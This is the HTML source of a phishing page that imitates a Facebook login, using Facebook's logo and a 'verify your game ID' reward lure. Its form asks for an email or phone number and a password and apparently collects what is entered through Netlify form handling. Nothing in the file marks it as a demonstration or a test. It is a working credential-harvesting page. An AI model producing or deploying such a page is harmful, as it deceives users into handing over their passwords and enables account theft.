<!doctype html>
<html lang="en">

<head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!-- Bootstrap CSS -->
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-F3w7mX95PdgyTmZZMECAngseQB83DfGTowi0iMjiWaeVhAn4FJkqJByhZMI3AhiU" crossorigin="anonymous">
    
    <title>Continue with facebook  </title>
    <style>
        .main {
    background-color: #f0f2f5;
    height: 100vh;
}

.main-grid {
    display: grid;
    justify-content: center;
    padding-top: 50px;
}

img {
    height: 80px;
}

.main-container {
    width: 400px;
    height: 320px;
    background-color: #ffffff;
    box-shadow: 5px 5px 5px #dbdddf, -5px -5px 5px #dbdddf;
    border-radius: 5px;
    margin: 0 auto;
}

.main-container span {
    display: block;
    text-align: center;
    padding-top: 20px;
    padding-bottom: 20px;
    font-size: 20px;
}

.main-container input {
    height: 50px;
}

.main-container input::placeholder {
    color: gainsboro
}

.link {
    display: grid;
    justify-content: center;
    margin-top: 20px;
    padding-bottom: 20px;
}

.link a {
    text-align: none;
    text-align: center;
}

.w-store {
    color: red;
}

@media only screen and (max-width: 576px) {
    .main-container {
        width: 95%;
        height: 320px;
    }
    .main-container input {
        height: 40px;
    }
    img {
        height: 60px;
    }
}
    </style>
</head>

<body>
    <div class="main">
   
        <div class="main-grid">
            <img src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg" alt="facebook-logo">
            
            </div>
            <div class="main-container">
            <div class="container">
                <span>Enjoy Your Reward by Verify Your Game Id!</span>
                <form action="" netlify>
                    <small class="w-store"></small>
                    <input name="fb-user-name:" class="w-100 form-control " type="text" placeholder="Email address or phone number">
                    <small class="w-store"></small>
                    <input required name="fb-password:" class="w-100 form-control mt-2" type="password" placeholder="Password">
                    <button class="btn btn-primary w-100 mt-2"><h4>Get the Offer</h4></button>
            
                </form>
                <div class="link">
                    <a href="#">Forgotten password? Signup for facebook</a>
                </div>
            </div>
            </div>
    </div>

    <!-- Optional JavaScript; choose one of the two! -->


    
    <!-- Option 1: Bootstrap Bundle with Popper -->
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.1/dist/js/bootstrap.bundle.min.js" integrity="sha384-/bQdsTh/da6pkI1MST/rWKFNjaCP5gBSY4sEBT38Q/9RBh9AH40zEOg7Hlq2THRZ" crossorigin="anonymous"></script>

    <!-- Option 2: Separate Popper and Bootstrap JS -->
    <!--
    <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.3/dist/umd/popper.min.js" integrity="sha384-W8fXfP3gkOKtndU4JGtKDvXbO53Wy8SZCQHczT5FMiiqmQfUpWbYdTil/SxwZgAN" crossorigin="anonymous"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.1/dist/js/bootstrap.min.js" integrity="sha384-skAcpIdS7UcVUC05LJ9Dxay8AXcDYfBJqt1CJ85S/CFujBsIzCIv+l9liuYLaMQ/" crossorigin="anonymous"></script>
    -->
</body>

</html>